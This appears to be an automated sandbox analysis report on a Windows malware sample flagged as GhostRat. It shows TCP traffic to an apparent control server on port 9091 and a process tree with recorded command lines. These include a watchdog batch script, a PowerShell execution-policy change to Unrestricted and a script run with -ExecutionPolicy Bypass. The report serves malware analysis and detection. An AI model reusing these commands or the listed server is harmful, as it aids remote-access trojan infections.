Jan 4, 2025 14:48:54.130106926 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.130129099 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.130160093 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.130944967 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.130979061 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.130986929 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.130994081 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.131000996 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.131010056 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.131042957 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.132149935 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.132165909 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.132177114 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.132194996 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.132203102 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.132209063 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.132282019 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.132906914 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.132916927 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.132925987 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.132936954 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.132953882 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.132981062 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.341739893 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.341753960 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.341763973 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.341773987 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.341815948 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.341845036 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.341847897 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.341861963 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.341872931 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.341882944 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.341892958 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.341902018 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.341909885 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.341912031 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.341927052 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.341949940 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.342099905 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.342109919 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.342119932 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.342148066 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.342159986 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.342164040 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.342175007 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.342174053 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.342202902 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.342786074 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.342833996 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.342844963 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.342855930 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.342865944 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.342886925 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.342940092 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.342986107 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.342997074 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.343123913 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.343815088 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.343826056 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.343836069 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.343852997 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.343862057 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.343864918 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.343873978 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.343889952 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.343902111 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.344898939 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.344909906 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.344926119 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.344932079 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.344942093 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.344952106 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.344968081 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.344995022 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.345640898 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.345659971 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.345669031 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.345679045 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.345706940 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.345732927 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.345743895 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.345755100 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.345767021 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.345781088 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.346661091 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.346673012 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.346690893 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.346699953 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.346703053 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.346714973 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.346726894 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.346729994 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.346761942 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.347727060 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.347738028 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.347748041 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.347758055 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.347769022 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.347784042 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.347821951 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.348510027 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.348527908 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.348545074 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.348558903 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.348561049 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.348570108 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.348592043 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.349406004 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.349438906 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.349482059 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.349522114 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.349533081 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.349543095 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.349556923 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.349566936 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.349572897 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.349612951 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.350439072 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.350476980 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.350492954 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.350503922 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.350512981 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.350531101 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.350564003 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.351417065 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.351453066 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.351459026 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.351488113 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.351499081 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.351509094 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.351524115 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.351556063 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.352402925 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.352416992 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.352427959 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.352438927 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.352452993 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.352477074 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.353316069 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.353327036 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.353338957 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.353351116 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.353358030 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.353362083 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.353375912 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.353410006 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.354201078 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.354218006 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.354259014 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.432341099 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.432352066 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.432363033 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.432372093 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.432384014 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.432398081 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.432399035 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.432425022 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.432436943 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.556545019 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.556581974 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.556593895 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.556605101 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.556617022 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.556627035 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.556638956 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.556649923 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.556672096 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.556710958 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.556726933 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.556737900 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.556744099 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.556752920 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.556768894 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.556791067 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:55.602216005 CET	53836	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:55.607095957 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:55.607202053 CET	53836	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:57.570367098 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:49:00.799948931 CET	53836	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:49:00.804789066 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:49:00.804804087 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:49:00.804816008 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:49:00.804886103 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:49:01.111509085 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:49:01.111746073 CET	53836	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:49:01.116578102 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:49:11.554837942 CET	53836	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:49:11.559590101 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:49:11.860512972 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:49:11.914063931 CET	53836	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:49:11.933573008 CET	53836	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:49:11.938539028 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:49:27.617522955 CET	53836	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:49:27.622421980 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:49:27.923638105 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:49:27.976602077 CET	53836	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:49:28.259026051 CET	53836	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:49:28.263972998 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:49:44.007951975 CET	53836	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:49:44.013021946 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:49:44.313946009 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:49:44.367253065 CET	53836	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:49:44.383272886 CET	53836	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:49:44.388189077 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:50:00.195548058 CET	53836	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:50:00.200601101 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:50:00.563298941 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:50:00.617255926 CET	53836	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:50:00.627787113 CET	53836	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:50:00.632602930 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:50:16.945668936 CET	53836	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:50:16.950552940 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:50:17.366136074 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:50:17.414170027 CET	53836	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:50:17.439631939 CET	53836	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:50:17.444469929 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:50:32.711210012 CET	53836	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:50:32.716135979 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:50:33.017203093 CET	9091	53836	137.220.229.61	192.168.2.4
Jan 4, 2025 14:50:33.070432901 CET	53836	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:50:33.081271887 CET	53836	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:50:33.086083889 CET	9091	53836	137.220.229.61	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 4, 2025 14:47:50.921052933 CET	53	57251	1.1.1.1	192.168.2.4

Target ID:	0
Start time:	08:47:29
Start date:	04/01/2025
Path:	C:\Users\user\Desktop\Uulw5M1DfU.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Uulw5M1DfU.exe"
Imagebase:	0x400000
File size:	67'003'808 bytes
MD5 hash:	F889FE126788FFBAFC2E0CD5E233FEE9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:47:37
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:47:37
Start date:	04/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:47:37
Start date:	04/01/2025
Path:	C:\Users\Public\Bilite\Axialis\Update.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Bilite\Axialis\Update.exe
Imagebase:	0x6e0000
File size:	395'368 bytes
MD5 hash:	FB325C945A08D06FE91681179BDCCC66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3003485617.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3510627044.0000000003670000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2842291150.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3490479814.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2679063829.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3003550749.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3334123549.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3490537983.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2556030347.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3166004269.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2679005729.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3510572930.00000000035B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2841813776.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2679005729.00000000047BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3511507592.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3334066140.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3510434362.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3165948702.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	08:48:47
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Imagebase:	0x110000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	08:48:48
Start date:	04/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	08:48:48
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist /FI "IMAGENAME eq Update.exe"
Imagebase:	0x10000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:48:48
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "Update.exe"
Imagebase:	0x7a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:48:48
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 30 /nobreak
Imagebase:	0x5f0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:48:48
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:48:48
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	08:48:48
Start date:	04/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:48:48
Start date:	04/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	08:48:48
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Imagebase:	0x130000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
